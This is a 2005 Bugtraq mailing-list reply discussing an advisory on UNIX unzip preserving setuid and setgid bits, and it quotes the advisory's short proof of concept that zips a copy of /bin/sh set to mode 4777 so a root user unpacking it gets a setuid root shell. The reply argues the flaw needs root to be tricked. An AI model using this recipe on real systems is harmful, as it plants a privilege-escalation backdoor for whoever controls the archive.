Re: 7a69Adv#22 - UNIX unzip keep setuid and setgid files

From: John Simpson (jms1_at_jms1.net)
Date: 02/28/05

  • Next message: JoCaNoR SeCuRiTy TeaM: "[ Postnuke all versions + pnphpbb <=1.2 sql injection - jocanor ]" 
    Date: Mon, 28 Feb 2005 17:20:10 -0500
To: bugtraq@securityfocus.com

    On 28 Feb 2005, at 08:17, Albert Puigsech Galicia wrote:
    >
    > III. Exploit
    >
    > It's realy easy to test this vulnerability. You can create a malicious
    > ZIP
    > file following this example:
    >
    > $ cp /bin/sh .
    > $ chmod 4777 sh
    > $ zip malicious.zip sh
    >
    >
    > When another user (including root) unpacks the file, a setuid shell
    > file will
    > be created without any warning, as you can see here:
    >
    > # id
    > # unzip malicious.zip
    > Archive: malicious.zip
    > inflating: sh
    > # ls -l sh
    > -rwsrwxrwx 1 root root 705148 Jan 16 17:04 sh

    this only works if the user un-zipping the file is already root.
    otherwise it creates an "sh" binary which is setuid to the user who
    unzipped the file. this kind of "exploit" is only useful if you can
    somehow trick root into unzipping the file- it cannot be used to gain
    root on a machine where you don't already have it.

    although i will agree that having the unzip program warn the user when
    creating a setuid or setgid file is a good idea in general.

    --------------------------------------------------
    | John M. Simpson - KG4ZOW - Programmer At Large |
    | http://www.jms1.net/ <jms1@jms1.net> |
    --------------------------------------------------
    | Mac OS X proves that it's easier to make UNIX |
    | pretty than it is to make Windows secure. |
    --------------------------------------------------

  • Next message: JoCaNoR SeCuRiTy TeaM: "[ Postnuke all versions + pnphpbb <=1.2 sql injection - jocanor ]"

    Relevant Pages

    • Flaws in recent Linux kernels
      ... The first vulnerability results in local DoS. ... to the ptrace bug mentioned. ... Root compromise by ptrace ... setuid root and world-executable. ...
      (Bugtraq)
    • Re: Is screen really secure?
      ... > "do not run a daemon as root as long isn't really require it".. ... Screen is setuid root by default. ... or you can make utmp/wtmp/lastlog group "utmp" ... Here's what I worry about. ...
      (FreeBSD-Security)
    • Re: tracing function calls
      ... AFAIR the result when trying without root privileges depends ... execute it anyway but ignore the setuid bit. ... port number, but connecting to a port doesn't require any ...
      (comp.os.linux.development.apps)
    • DMA[2005-0501a] - ARPUS/Ce setuid buffer overflow and file overwrite
      ... Ce/Ceterm aka. ARPUS/Ce is an integrated ascii text editor and X based terminal emulator ... In the past machines other than SunOS and Apollo had to have ceterm installed as setuid root. ...
      (Bugtraq)
    • [Full-disclosure] DMA[2005-0501a] - ARPUS/Ce setuid buffer overflow and file overwrite
      ... Ce/Ceterm aka. ARPUS/Ce is an integrated ascii text editor and X based terminal emulator ... In the past machines other than SunOS and Apollo had to have ceterm installed as setuid root. ...
      (Full-Disclosure)
    • Quantcast